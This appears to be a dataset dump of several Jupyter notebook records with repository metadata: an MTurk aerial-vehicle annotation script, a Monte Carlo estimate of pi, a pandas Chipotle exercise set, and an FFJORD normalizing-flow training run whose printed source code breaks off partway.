"def crop_corner_images(im:Image, xy:tuple, size:int, marker_color:tuple, image_file_path):\n x,y = xy\n crop = im.crop((x-size, y-size, x+size, y+size))\n assert crop.size, \"Invalid crop size.\"\n \n #print(crop.size)\n wc,hc = crop.size\n draw = ImageDraw.Draw(crop)\n w1,h1 = wc//2,hc//2\n \n draw.line((w1, 0)+ ( w1,hc), fill=marker_color,width=1)\n draw.line((0, h1)+ ( wc,h1), fill=marker_color, width=1)\n \n crop.convert('RGB').save(image_file_path)\n w,h = crop.size",
"_____no_output_____"
]
],
[
[
"### Mark vehicle location on the cropped slice",
"_____no_output_____"
]
],
[
[
"def mark_bounding_boxes(imarr:np.array, marker_color:tuple, image_file_path:os.path):\n img = Image.fromarray(imarr)#.resize((400,400), Image.LANCZOS)\n draw = ImageDraw.Draw(img)\n \n \n w,h = img.size\n\n p = ( int(floor(w/2))-50, int(floor(h/2))-50, int(floor(w/2))+50, int(floor(h/2))+50 )\n #print(p)\n\n \n w1,h1 = (w//2),(h//2)\n draw.line((w1, 0)+ ( w1,h), fill=marker_color, width=1)\n draw.line((0, h1)+ ( w,h1), fill=marker_color,width=1)\n \n img.convert('RGB').save(image_file_path)\n w,h = img.size",
"_____no_output_____"
]
],
[
[
"#### Correct the path of short answers from Selwyn dataset. Following lines of code needs to be updated in next cell .\n`filedir = os.path.join(os.path.join(r'C:\\Users\\exx\\Documents\\lab'), \"LINZ\",\"Final\",\"001_selwyn-0125m-urban-aerial-photos-2012-2013\")`",
"_____no_output_____"
]
],
[
[
"path = Path(os.getcwd())\n#get folder's storage\nfiledir = os.path.join(os.path.join(r'C:\\Users\\exx\\Documents\\lab'), \"LINZ\",\"Final\",\"001_selwyn-0125m-urban-aerial-photos-2012-2013\")\nmain_folders = [os.path.join(filedir,name) for name in os.listdir(filedir)]\nmain_folders",
"_____no_output_____"
]
],
[
[
"### Load the results path",
"_____no_output_____"
]
],
[
[
"rootpath = Path(os.getcwd())\nanswers_path = os.path.join(rootpath,\"batch100_HITs\",\"answers\", \"selwyn_answers_identification.csv\")\noutput_path = os.path.join(rootpath,\"batch100_HITs\",\"results\")\nresults_path = os.path.join(rootpath,\"batch100_HITs\",\"batch_results\")",
"_____no_output_____"
],
[
"files = os.listdir(results_path)\nfiles",
"_____no_output_____"
]
],
[
[
"### Load batch results to Dataframe",
"_____no_output_____"
]
],
[
[
"df = pd.read_csv(os.path.join(results_path,files[0]))",
"_____no_output_____"
],
[
"df.columns",
"_____no_output_____"
],
[
"submitted_answers = df[['HITId','Answer.taskAnswers', 'WorkerId', 'WorkTimeInSeconds', 'LifetimeApprovalRate','Approve', 'Reject']]",
"_____no_output_____"
],
[
"submitted_answers['WorkTimeInSeconds'].max()",
"_____no_output_____"
],
[
"submitted_answers[['Answer.taskAnswers']]",
"_____no_output_____"
],
[
"workers = list(submitted_answers.groupby(['WorkerId']).groups.keys())\nlen(workers)",
"_____no_output_____"
]
],
[
[
"### Filter by worker id",
"_____no_output_____"
]
],
[
[
"submitted_answers.loc[submitted_answers['WorkerId'] == workers[0]] [['Answer.taskAnswers']]",
"_____no_output_____"
]
],
[
[
"### Get hit ids from results",
"_____no_output_____"
]
],
[
[
"hitids = list(submitted_answers.groupby(['HITId']).groups.keys())",
"_____no_output_____"
],
[
"len(hitids)",
"_____no_output_____"
]
],
[
[
"### Load the Ground truth with answers",
"_____no_output_____"
]
],
[
[
"answers = pd.read_csv(answers_path)",
"_____no_output_____"
],
[
"answers.info()",
"<class 'pandas.core.frame.DataFrame'>\nRangeIndex: 20 entries, 0 to 19\nData columns (total 8 columns):\n # Column Non-Null Count Dtype \n--- ------ -------------- ----- \n 0 image_url 20 non-null object\n 1 url 20 non-null object\n 2 vehicle_types 20 non-null object\n 3 # of vehicles 20 non-null int64 \n 4 truck 2 non-null object\n 5 small 3 non-null object\n 6 specialized 1 non-null object\n 7 trailer_small 3 non-null object\ndtypes: int64(1), object(7)\nmemory usage: 1.4+ KB\n"
],
[
"#h,w,_ = imarray.shape\noverlap = 0.2\ntile_size = 300\nstride = int(tile_size * (1-overlap))\nwindow_width = tile_size\nmarker_color = (200,200,200,255)\n\ncropsize = 306\nsize = int(cropsize/2)",
"_____no_output_____"
]
],
[
[
"### For each worker, extract locations, transform to main image locations and crop the slices from main images (main images are actually larger than the slices.)\n#### Each of cropped slice is saved to image file path that has been sent as input to each of crop_corner_images or mark_bounding_boxes.\n#### if you want to save these images to specific path, please make sure to pass the correct path to both of these crop_corner_images or mark_bounding_boxes methods.",
"_____no_output_____"
]
],
[
[
"for worker in workers:\n worker_total_scores = 0\n total_worker_time = 0\n worker_answers = submitted_answers.loc[submitted_answers['WorkerId'] == worker]\n \n for index in worker_answers.index:\n feedback = \"\"\n \n ans = worker_answers['Answer.taskAnswers'][index]\n #print(ans)\n ans = json.loads(ans)#.replace(\"[\",\"\").replace(\"]\",\"\"))\n \n if not os.path.exists(os.path.join(output_path,\"from_main_image\",worker)):\n os.mkdir(os.path.join(output_path,\"from_main_image\",worker))\n outdirectory = os.path.join(output_path,\"from_main_image\",worker)\n \n for k,v in ans[0].items():\n if k != \"feedback\" :\n foldername, filename = k.split(\"/\")[6:]\n x,y = filename.split(\".\")[0].split(\"-\")[2:]\n x,y = int(x),int(y)\n mainfolder,subfolder = foldername.split(\"_\")\n main_image_name = foldername+\"_image.png\"\n row = answers.loc[answers['url'] == k].fillna('')\n #print(filename)\n \n if not os.path.exists(os.path.join(outdirectory,foldername)):\n os.mkdir(os.path.join(outdirectory,foldername))\n\n if len(v['keypoints']) != 0:\n im = Image.open(os.path.join(filedir,mainfolder, subfolder, main_image_name))\n #print(im.size,x,y )\n w,h = im.size\n imarray = np.asarray(im)\n #print(imarray.shape)\n pts = [[int(pt['x']),int(pt['y'])] for pt in v[\"keypoints\"]]\n for pt in pts:\n #print(pt, pt[1]+x, pt[0]+y)\n i,j = pt[1]+y, pt[0]+x\n imname = os.path.join(outdirectory,foldername, str(i)+\"-\"+str(j)+\".png\")\n\n crop_slice = np.s_[i-size:i+size, j-size:j+size]\n needs_padding = False\n for slic in crop_slice:\n if slic.start < 0 or (slic.stop-slic.start) < (2*size):\n #print(slic.start, slic.stop-slic.start, 2*size)\n needs_padding = True\n break\n #print(needs_padding, marker_color, x,y)\n if needs_padding:\n crop_corner_images(im, (j,i), size, marker_color,imname)\n else:\n imarr = imarray[crop_slice]\n h,w,_ = imarr.shape\n if h < cropsize or w < cropsize:\n crop_corner_images(im, (j,i), size, marker_color,imname)\n else:\n mark_bounding_boxes(imarray[crop_slice],marker_color, imname)\n\n ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e7071b4ede8b5d4af18ca47e217e9d74e503653a | 2,881 | ipynb | Jupyter Notebook | Pi approximation via Monte Carlo.ipynb | migueltorrescosta/tutor | a6918bee7a64b11c3a8059c6d85c6f4a9de6e104 | [
"MIT"
] | null | null | null | Pi approximation via Monte Carlo.ipynb | migueltorrescosta/tutor | a6918bee7a64b11c3a8059c6d85c6f4a9de6e104 | [
"MIT"
] | null | null | null | Pi approximation via Monte Carlo.ipynb | migueltorrescosta/tutor | a6918bee7a64b11c3a8059c6d85c6f4a9de6e104 | [
"MIT"
] | null | null | null | 21.825758 | 129 | 0.537313 | [
[
[
"# All imports",
"_____no_output_____"
]
],
[
[
"import numpy as np",
"_____no_output_____"
]
],
[
[
"# Aux functions",
"_____no_output_____"
]
],
[
[
"# Generates random points on the square x,y in [-1,1]\ndef sample_points(n):\n x_coordinates = list(map(lambda x:2*x-1,np.random.rand(n)))\n y_coordinates = list(map(lambda x:2*x-1,np.random.rand(n)))\n points = list(zip(x_coordinates,y_coordinates))\n return points\n\n# Returns true if a point is inside the unit circle\ndef valid_point(x):\n return x[0]**2 + x[1]**2 <= 1\n\n# Returns the percentage of points inside the unit circle\ndef percentage_of_valid_points(points):\n number_of_valid_points = sum(map(lambda x:valid_point(x),points))\n return number_of_valid_points*1./len(points)\n\n# Given a percentage p of points inside the circle, returns an approximation of PI\ndef pi_approximation(p):\n return 4*p\n\n# Runs the above functions in order\ndef pipeline(n):\n points = sample_points(n)\n p = percentage_of_valid_points(points)\n return pi_approximation(p)",
"_____no_output_____"
]
],
[
[
"# Defining variables",
"_____no_output_____"
]
],
[
[
"number_of_points = 10**7",
"_____no_output_____"
]
],
[
[
"# Running the script",
"_____no_output_____"
]
],
[
[
"pipeline(number_of_points)",
"_____no_output_____"
]
],
[
[
"### TODO: Plot the pi approximation as the number of samples increase (maybe use log scale for better view of the process).",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
e7071c93adb9ae7cb794b07e69bd22dad9d52a68 | 6,012 | ipynb | Jupyter Notebook | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | CharlesMaponya/pandas_exercises | 58a21590d02c3af0bd854fb6f7f2b321439e6360 | [
"BSD-3-Clause"
] | null | null | null | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | CharlesMaponya/pandas_exercises | 58a21590d02c3af0bd854fb6f7f2b321439e6360 | [
"BSD-3-Clause"
] | null | null | null | 01_Getting_&_Knowing_Your_Data/Chipotle/Exercises.ipynb | CharlesMaponya/pandas_exercises | 58a21590d02c3af0bd854fb6f7f2b321439e6360 | [
"BSD-3-Clause"
] | null | null | null | 18.054054 | 135 | 0.498503 | [
[
[
"# Ex2 - Getting and Knowing your Data",
"_____no_output_____"
],
[
"This time we are going to pull data directly from the internet.\nSpecial thanks to: https://github.com/justmarkham for sharing the dataset and materials.\n\n### Step 1. Import the necessary libraries",
"_____no_output_____"
],
[
"### Step 2. Import the dataset from this [address](https://raw.githubusercontent.com/justmarkham/DAT8/master/data/chipotle.tsv). ",
"_____no_output_____"
],
[
"### Step 3. Assign it to a variable called chipo.",
"_____no_output_____"
],
[
"### Step 4. See the first 10 entries",
"_____no_output_____"
],
[
"### Step 5. What is the number of observations in the dataset?",
"_____no_output_____"
]
],
[
[
"# Solution 1\n\n",
"_____no_output_____"
],
[
"# Solution 2\n\n",
"_____no_output_____"
]
],
[
[
"### Step 6. What is the number of columns in the dataset?",
"_____no_output_____"
],
[
"### Step 7. Print the name of all the columns.",
"_____no_output_____"
],
[
"### Step 8. How is the dataset indexed?",
"_____no_output_____"
],
[
"### Step 9. Which was the most-ordered item? ",
"_____no_output_____"
],
[
"### Step 10. For the most-ordered item, how many items were ordered?",
"_____no_output_____"
],
[
"### Step 11. What was the most ordered item in the choice_description column?",
"_____no_output_____"
],
[
"### Step 12. How many items were orderd in total?",
"_____no_output_____"
],
[
"### Step 13. Turn the item price into a float",
"_____no_output_____"
],
[
"#### Step 13.a. Check the item price type",
"_____no_output_____"
],
[
"#### Step 13.b. Create a lambda function and change the type of item price",
"_____no_output_____"
],
[
"#### Step 13.c. Check the item price type",
"_____no_output_____"
],
[
"### Step 14. How much was the revenue for the period in the dataset?",
"_____no_output_____"
],
[
"### Step 15. How many orders were made in the period?",
"_____no_output_____"
],
[
"### Step 16. What is the average revenue amount per order?",
"_____no_output_____"
]
],
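[
[
"# Possible solutions for Steps 6-15, sketched as hedged one-liners\n# (assumes `chipo` was loaded in Step 3 with the columns shown in Step 7):\nchipo.shape[1]                                    # Step 6: number of columns\nprint(', '.join(chipo.columns))                   # Step 7: column names\nchipo.index                                       # Step 8: a RangeIndex\nchipo.groupby('item_name')['quantity'].sum().nlargest(1)  # Steps 9-10\nchipo['choice_description'].value_counts().head(1)        # Step 11\nchipo['quantity'].sum()                           # Step 12: items ordered in total\nchipo['item_price'].dtype                         # Step 13.a: object (string)\nchipo['item_price'] = chipo['item_price'].apply(lambda p: float(p.strip('$')))  # Step 13.b\nchipo.dtypes                                      # Step 13.c\n(chipo['item_price'] * chipo['quantity']).sum()   # Step 14: total revenue\nchipo['order_id'].nunique()                       # Step 15: number of orders",
"_____no_output_____"
]
],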
[
[
"# Solution 1\n\n",
"_____no_output_____"
],
[
"# Solution 2\n\n",
"_____no_output_____"
]
],
[
[
"### Step 17. How many different items are sold?",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
]
] |
e7071dc356689aaa367ca0ead65f6cf324acf130 | 737,247 | ipynb | Jupyter Notebook | unconditional/main_bs8K_errcontrol_7gpus_adaptive_run1.ipynb | minhtannguyen/ffjord | f3418249eaa4647f4339aea8d814cf2ce33be141 | [
"MIT"
] | null | null | null | unconditional/main_bs8K_errcontrol_7gpus_adaptive_run1.ipynb | minhtannguyen/ffjord | f3418249eaa4647f4339aea8d814cf2ce33be141 | [
"MIT"
] | null | null | null | unconditional/main_bs8K_errcontrol_7gpus_adaptive_run1.ipynb | minhtannguyen/ffjord | f3418249eaa4647f4339aea8d814cf2ce33be141 | [
"MIT"
] | null | null | null | 103.618693 | 2,034 | 0.545927 | [
[
[
"import os\nos.environ['CUDA_VISIBLE_DEVICES']='0,1,2,3,4,5,6'",
"_____no_output_____"
],
[
"# %run -p ../train_cnf_adaptive.py --data mnist --dims 64,64,64 --strides 1,1,1,1 --num_blocks 2 --layer_type concat --multiscale True --rademacher True --batch_size 900 --test_batch_size 5000 --save ../experiments_published/cnf_published_bs8K_errcontrol_7gpus_adaptive_1 --seed 0 --conditional False --controlled_tol True --lr 0.001 --warmup_iters 113 --atol 1e-4 --rtol 1e-4 --log_freq 11 --batch_size_schedule \"3-5-7-9-11-13-15-17-19-21\"\n# #",
"_____no_output_____"
],
[
"%run -p ../train_cnf.py --data mnist --dims 64,64,64 --strides 1,1,1,1 --num_blocks 2 --layer_type concat --multiscale True --rademacher True --batch_size 8000 --test_batch_size 5000 --save ../experiments_published/cnf_published_bs8K_errcontrol_7gpus_adaptive_1 --resume ../experiments_published/cnf_published_bs8K_errcontrol_7gpus_adaptive_1/epoch_400_checkpt.pth --seed 0 --conditional False --controlled_tol True --lr 0.0001 --warmup_iters 113 --atol 1e-4 --rtol 1e-4\n#",
"/tancode/repos/tan-ffjord/train_cnf.py\nimport argparse\nimport os\nimport time\nimport numpy as np\n\nimport torch\nimport torch.optim as optim\nimport torchvision.datasets as dset\nimport torchvision.transforms as tforms\nfrom torchvision.utils import save_image\n\nimport lib.layers as layers\nimport lib.utils as utils\nimport lib.multiscale_parallel as multiscale_parallel\nimport lib.modules as modules\nimport lib.thops as thops\n\nfrom train_misc import standard_normal_logprob\nfrom train_misc import set_cnf_options, count_nfe, count_parameters, count_total_time\nfrom train_misc import add_spectral_norm, spectral_norm_power_iteration\nfrom train_misc import create_regularization_fns, get_regularization, append_regularization_to_log\n\nfrom tensorboardX import SummaryWriter\n\n# go fast boi!!\ntorch.backends.cudnn.benchmark = True\nSOLVERS = [\"dopri5\", \"bdf\", \"rk4\", \"midpoint\", 'adams', 'explicit_adams']\nparser = argparse.ArgumentParser(\"Continuous Normalizing Flow\")\nparser.add_argument(\"--data\", choices=[\"mnist\", \"svhn\", \"cifar10\", 'lsun_church'], type=str, default=\"mnist\")\nparser.add_argument(\"--dims\", type=str, default=\"8,32,32,8\")\nparser.add_argument(\"--strides\", type=str, default=\"2,2,1,-2,-2\")\nparser.add_argument(\"--num_blocks\", type=int, default=1, help='Number of stacked CNFs.')\n\nparser.add_argument(\"--conv\", type=eval, default=True, choices=[True, False])\nparser.add_argument(\n \"--layer_type\", type=str, default=\"ignore\",\n choices=[\"ignore\", \"concat\", \"concat_v2\", \"squash\", \"concatsquash\", \"concatcoord\", \"hyper\", \"blend\"]\n)\nparser.add_argument(\"--divergence_fn\", type=str, default=\"approximate\", choices=[\"brute_force\", \"approximate\"])\nparser.add_argument(\n \"--nonlinearity\", type=str, default=\"softplus\", choices=[\"tanh\", \"relu\", \"softplus\", \"elu\", \"swish\"]\n)\n\nparser.add_argument(\"--seed\", type=int, default=0)\n\nparser.add_argument('--solver', type=str, default='dopri5', choices=SOLVERS)\nparser.add_argument('--atol', type=float, default=1e-5)\nparser.add_argument('--rtol', type=float, default=1e-5)\nparser.add_argument(\"--step_size\", type=float, default=None, help=\"Optional fixed step size.\")\n\nparser.add_argument('--test_solver', type=str, default=None, choices=SOLVERS + [None])\nparser.add_argument('--test_atol', type=float, default=None)\nparser.add_argument('--test_rtol', type=float, default=None)\n\nparser.add_argument(\"--imagesize\", type=int, default=None)\nparser.add_argument(\"--alpha\", type=float, default=1e-6)\nparser.add_argument('--time_length', type=float, default=1.0)\nparser.add_argument('--train_T', type=eval, default=True)\n\nparser.add_argument(\"--num_epochs\", type=int, default=1000)\nparser.add_argument(\"--batch_size\", type=int, default=200)\nparser.add_argument(\n \"--batch_size_schedule\", type=str, default=\"\", help=\"Increases the batchsize at every given epoch, dash separated.\"\n)\nparser.add_argument(\"--test_batch_size\", type=int, default=200)\nparser.add_argument(\"--lr\", type=float, default=1e-3)\nparser.add_argument(\"--warmup_iters\", type=float, default=1000)\nparser.add_argument(\"--weight_decay\", type=float, default=0.0)\nparser.add_argument(\"--spectral_norm_niter\", type=int, default=10)\nparser.add_argument(\"--weight_y\", type=float, default=0.5)\n\nparser.add_argument(\"--add_noise\", type=eval, default=True, choices=[True, False])\nparser.add_argument(\"--batch_norm\", type=eval, default=False, choices=[True, 
False])\nparser.add_argument('--residual', type=eval, default=False, choices=[True, False])\nparser.add_argument('--autoencode', type=eval, default=False, choices=[True, False])\nparser.add_argument('--rademacher', type=eval, default=True, choices=[True, False])\nparser.add_argument('--spectral_norm', type=eval, default=False, choices=[True, False])\nparser.add_argument('--multiscale', type=eval, default=False, choices=[True, False])\nparser.add_argument('--parallel', type=eval, default=False, choices=[True, False])\nparser.add_argument('--conditional', type=eval, default=False, choices=[True, False])\nparser.add_argument('--controlled_tol', type=eval, default=False, choices=[True, False])\nparser.add_argument(\"--train_mode\", choices=[\"semisup\", \"sup\", \"unsup\"], type=str, default=\"semisup\")\n\n# Regularizations\nparser.add_argument('--l1int', type=float, default=None, help=\"int_t ||f||_1\")\nparser.add_argument('--l2int', type=float, default=None, help=\"int_t ||f||_2\")\nparser.add_argument('--dl2int', type=float, default=None, help=\"int_t ||f^T df/dt||_2\")\nparser.add_argument('--JFrobint', type=float, default=None, help=\"int_t ||df/dx||_F\")\nparser.add_argument('--JdiagFrobint', type=float, default=None, help=\"int_t ||df_i/dx_i||_F\")\nparser.add_argument('--JoffdiagFrobint', type=float, default=None, help=\"int_t ||df/dx - df_i/dx_i||_F\")\n\nparser.add_argument(\"--time_penalty\", type=float, default=0, help=\"Regularization on the end_time.\")\nparser.add_argument(\n \"--max_grad_norm\", type=float, default=1e10,\n help=\"Max norm of graidents (default is just stupidly high to avoid any clipping)\"\n)\n\nparser.add_argument(\"--begin_epoch\", type=int, default=1)\nparser.add_argument(\"--resume\", type=str, default=None)\nparser.add_argument(\"--save\", type=str, default=\"experiments/cnf\")\nparser.add_argument(\"--val_freq\", type=int, default=1)\nparser.add_argument(\"--log_freq\", type=int, default=1)\n\nargs = parser.parse_args()\n\nif args.controlled_tol:\n import lib.odenvp_conditional_tol as odenvp\nelse:\n import lib.odenvp_conditional as odenvp\n \n# set seed\ntorch.manual_seed(args.seed)\nnp.random.seed(args.seed)\n\n# logger\nutils.makedirs(args.save)\nlogger = utils.get_logger(logpath=os.path.join(args.save, 'logs'), filepath=os.path.abspath(__file__)) # write to log file\nwriter = SummaryWriter(os.path.join(args.save, 'tensorboard')) # write to tensorboard\n\nif args.layer_type == \"blend\":\n logger.info(\"!! Setting time_length from None to 1.0 due to use of Blend layers.\")\n args.time_length = 1.0\n\nlogger.info(args)\n\n\ndef add_noise(x):\n \"\"\"\n [0, 1] -> [0, 255] -> add noise -> [0, 1]\n \"\"\"\n if args.add_noise:\n noise = x.new().resize_as_(x).uniform_()\n x = x * 255 + noise\n x = x / 256\n return x\n\n\ndef update_lr(optimizer, itr):\n iter_frac = min(float(itr + 1) / max(args.warmup_iters, 1), 1.0)\n lr = args.lr * iter_frac\n for param_group in optimizer.param_groups:\n param_group[\"lr\"] = lr\n\n\ndef get_train_loader(train_set, epoch):\n if args.batch_size_schedule != \"\":\n epochs = [0] + list(map(int, args.batch_size_schedule.split(\"-\")))\n n_passed = sum(np.array(epochs) <= epoch)\n current_batch_size = int(args.batch_size * n_passed)\n else:\n current_batch_size = args.batch_size\n train_loader = torch.utils.data.DataLoader(\n dataset=train_set, batch_size=current_batch_size, shuffle=True, drop_last=True, pin_memory=True\n )\n logger.info(\"===> Using batch size {}. 
Total {} iterations/epoch.\".format(current_batch_size, len(train_loader)))\n return train_loader\n\n\ndef get_dataset(args):\n trans = lambda im_size: tforms.Compose([tforms.Resize(im_size), tforms.ToTensor(), add_noise])\n\n if args.data == \"mnist\":\n im_dim = 1\n im_size = 28 if args.imagesize is None else args.imagesize\n train_set = dset.MNIST(root=\"../data\", train=True, transform=trans(im_size), download=True)\n test_set = dset.MNIST(root=\"../data\", train=False, transform=trans(im_size), download=True)\n elif args.data == \"svhn\":\n im_dim = 3\n im_size = 32 if args.imagesize is None else args.imagesize\n train_set = dset.SVHN(root=\"../data\", split=\"train\", transform=trans(im_size), download=True)\n test_set = dset.SVHN(root=\"../data\", split=\"test\", transform=trans(im_size), download=True)\n elif args.data == \"cifar10\":\n im_dim = 3\n im_size = 32 if args.imagesize is None else args.imagesize\n train_set = dset.CIFAR10(\n root=\"../data\", train=True, transform=tforms.Compose([\n tforms.Resize(im_size),\n tforms.RandomHorizontalFlip(),\n tforms.ToTensor(),\n add_noise,\n ]), download=True\n )\n test_set = dset.CIFAR10(root=\"../data\", train=False, transform=trans(im_size), download=True)\n elif args.data == 'celeba':\n im_dim = 3\n im_size = 64 if args.imagesize is None else args.imagesize\n train_set = dset.CelebA(\n train=True, transform=tforms.Compose([\n tforms.ToPILImage(),\n tforms.Resize(im_size),\n tforms.RandomHorizontalFlip(),\n tforms.ToTensor(),\n add_noise,\n ])\n )\n test_set = dset.CelebA(\n train=False, transform=tforms.Compose([\n tforms.ToPILImage(),\n tforms.Resize(im_size),\n tforms.ToTensor(),\n add_noise,\n ])\n )\n elif args.data == 'lsun_church':\n im_dim = 3\n im_size = 64 if args.imagesize is None else args.imagesize\n train_set = dset.LSUN(\n '../data', ['church_outdoor_train'], transform=tforms.Compose([\n tforms.Resize(96),\n tforms.RandomCrop(64),\n tforms.Resize(im_size),\n tforms.ToTensor(),\n add_noise,\n ])\n )\n test_set = dset.LSUN(\n '../data', ['church_outdoor_val'], transform=tforms.Compose([\n tforms.Resize(96),\n tforms.RandomCrop(64),\n tforms.Resize(im_size),\n tforms.ToTensor(),\n add_noise,\n ])\n ) \n elif args.data == 'imagenet_64':\n im_dim = 3\n im_size = 64 if args.imagesize is None else args.imagesize\n train_set = dset.ImageFolder(\n train=True, transform=tforms.Compose([\n tforms.ToPILImage(),\n tforms.Resize(im_size),\n tforms.RandomHorizontalFlip(),\n tforms.ToTensor(),\n add_noise,\n ])\n )\n test_set = dset.ImageFolder(\n train=False, transform=tforms.Compose([\n tforms.ToPILImage(),\n tforms.Resize(im_size),\n tforms.ToTensor(),\n add_noise,\n ])\n )\n \n data_shape = (im_dim, im_size, im_size)\n if not args.conv:\n data_shape = (im_dim * im_size * im_size,)\n\n test_loader = torch.utils.data.DataLoader(\n dataset=test_set, batch_size=args.test_batch_size, shuffle=False, drop_last=True\n )\n return train_set, test_loader, data_shape\n\n\ndef compute_bits_per_dim(x, model):\n zero = torch.zeros(x.shape[0], 1).to(x)\n\n # Don't use data parallelize if batch size is small.\n # if x.shape[0] < 200:\n # model = model.module\n \n z, delta_logp = model(x, zero) # run model forward\n\n logpz = standard_normal_logprob(z).view(z.shape[0], -1).sum(1, keepdim=True) # logp(z)\n logpx = logpz - delta_logp\n\n logpx_per_dim = torch.sum(logpx) / x.nelement() # averaged over batches\n bits_per_dim = -(logpx_per_dim - np.log(256)) / np.log(2)\n\n return bits_per_dim\n\ndef compute_bits_per_dim_conditional(x, y, model):\n zero 
= torch.zeros(x.shape[0], 1).to(x)\n y_onehot = thops.onehot(y, num_classes=model.module.y_class).to(x)\n\n # Don't use data parallelize if batch size is small.\n # if x.shape[0] < 200:\n # model = model.module\n \n z, delta_logp = model(x, zero) # run model forward\n \n # prior\n mean, logs = model.module._prior(y_onehot)\n\n logpz = modules.GaussianDiag.logp(mean, logs, z).view(-1,1) # logp(z)\n logpx = logpz - delta_logp\n\n logpx_per_dim = torch.sum(logpx) / x.nelement() # averaged over batches\n bits_per_dim = -(logpx_per_dim - np.log(256)) / np.log(2)\n \n # compute xentropy loss\n y_logits = model.module.project_class(z)\n loss_xent = model.module.loss_class(y_logits, y.to(x.get_device()))\n y_predicted = np.argmax(y_logits.cpu().detach().numpy(), axis=1)\n\n return bits_per_dim, loss_xent, y_predicted\n\ndef create_model(args, data_shape, regularization_fns):\n hidden_dims = tuple(map(int, args.dims.split(\",\")))\n strides = tuple(map(int, args.strides.split(\",\")))\n\n if args.multiscale:\n model = odenvp.ODENVP(\n (args.batch_size, *data_shape),\n n_blocks=args.num_blocks,\n intermediate_dims=hidden_dims,\n nonlinearity=args.nonlinearity,\n alpha=args.alpha,\n cnf_kwargs={\"T\": args.time_length, \"train_T\": args.train_T, \"regularization_fns\": regularization_fns, \"solver\": args.solver, \"atol\": args.atol, \"rtol\": args.rtol},)\n elif args.parallel:\n model = multiscale_parallel.MultiscaleParallelCNF(\n (args.batch_size, *data_shape),\n n_blocks=args.num_blocks,\n intermediate_dims=hidden_dims,\n alpha=args.alpha,\n time_length=args.time_length,\n )\n else:\n if args.autoencode:\n\n def build_cnf():\n autoencoder_diffeq = layers.AutoencoderDiffEqNet(\n hidden_dims=hidden_dims,\n input_shape=data_shape,\n strides=strides,\n conv=args.conv,\n layer_type=args.layer_type,\n nonlinearity=args.nonlinearity,\n )\n odefunc = layers.AutoencoderODEfunc(\n autoencoder_diffeq=autoencoder_diffeq,\n divergence_fn=args.divergence_fn,\n residual=args.residual,\n rademacher=args.rademacher,\n )\n cnf = layers.CNF(\n odefunc=odefunc,\n T=args.time_length,\n regularization_fns=regularization_fns,\n solver=args.solver,\n )\n return cnf\n else:\n\n def build_cnf():\n diffeq = layers.ODEnet(\n hidden_dims=hidden_dims,\n input_shape=data_shape,\n strides=strides,\n conv=args.conv,\n layer_type=args.layer_type,\n nonlinearity=args.nonlinearity,\n )\n odefunc = layers.ODEfunc(\n diffeq=diffeq,\n divergence_fn=args.divergence_fn,\n residual=args.residual,\n rademacher=args.rademacher,\n )\n cnf = layers.CNF(\n odefunc=odefunc,\n T=args.time_length,\n train_T=args.train_T,\n regularization_fns=regularization_fns,\n solver=args.solver,\n )\n return cnf\n\n chain = [layers.LogitTransform(alpha=args.alpha)] if args.alpha > 0 else [layers.ZeroMeanTransform()]\n chain = chain + [build_cnf() for _ in range(args.num_blocks)]\n if args.batch_norm:\n chain.append(layers.MovingBatchNorm2d(data_shape[0]))\n model = layers.SequentialFlow(chain)\n return model\n\n\nif __name__ == \"__main__\":\n\n # get deivce\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n cvt = lambda x: x.type(torch.float32).to(device, non_blocking=True)\n\n # load dataset\n train_set, test_loader, data_shape = get_dataset(args)\n\n # build model\n regularization_fns, regularization_coeffs = create_regularization_fns(args)\n model = create_model(args, data_shape, regularization_fns)\n\n if args.spectral_norm: add_spectral_norm(model, logger)\n set_cnf_options(args, model)\n\n logger.info(model)\n 
logger.info(\"Number of trainable parameters: {}\".format(count_parameters(model)))\n \n writer.add_text('info', \"Number of trainable parameters: {}\".format(count_parameters(model)))\n\n # optimizer\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.weight_decay)\n \n # set initial iter\n itr = 1\n \n # set the meters\n time_epoch_meter = utils.RunningAverageMeter(0.97)\n time_meter = utils.RunningAverageMeter(0.97)\n loss_meter = utils.RunningAverageMeter(0.97) # track total loss\n nll_meter = utils.RunningAverageMeter(0.97) # track negative log-likelihood\n xent_meter = utils.RunningAverageMeter(0.97) # track xentropy score\n error_meter = utils.RunningAverageMeter(0.97) # track error score\n steps_meter = utils.RunningAverageMeter(0.97)\n grad_meter = utils.RunningAverageMeter(0.97)\n tt_meter = utils.RunningAverageMeter(0.97)\n\n # restore parameters\n if args.resume is not None:\n checkpt = torch.load(args.resume, map_location=lambda storage, loc: storage)\n model.load_state_dict(checkpt[\"state_dict\"])\n if \"optim_state_dict\" in checkpt.keys():\n optimizer.load_state_dict(checkpt[\"optim_state_dict\"])\n # Manually move optimizer state to device.\n for state in optimizer.state.values():\n for k, v in state.items():\n if torch.is_tensor(v):\n state[k] = cvt(v)\n args.begin_epoch = checkpt['epoch'] + 1\n itr = checkpt['iter'] + 